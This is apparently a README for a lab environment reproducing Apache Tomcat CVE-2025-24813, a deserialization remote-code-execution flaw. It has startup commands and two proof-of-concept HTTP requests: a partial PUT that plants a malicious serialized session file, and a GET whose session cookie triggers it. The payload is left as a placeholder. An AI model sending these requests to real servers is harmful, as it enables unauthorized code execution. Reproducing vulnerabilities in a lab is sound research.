
tomcat CVE-2025-24813 反序列化RCE环境
هذا المستودع هو البيئة المخصصة لإعادة إنتاج ثغرة RCE الأخيرة في Tomcat CVE-2025-24813.
للاستخدام التعليمي والبحثي فقط!
هذه البيئة قد مكّنت الشروط المذكورة أعلاه لإعادة الإنتاج.
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
الوصول: http://127.0.0.1:9001/
إنشاء ملف تسلسل ضار، واستخدام حزمة البيانات التالية لرفعه. يجب ملاحظة أن قيمة النطاق (Range) يجب أن تتطابق مع Length، وتكون أكبر من طول الملف الحالي.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{محتويات ملف إلغاء التسلسل}}
استخدام POC التالي للتفعيل:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx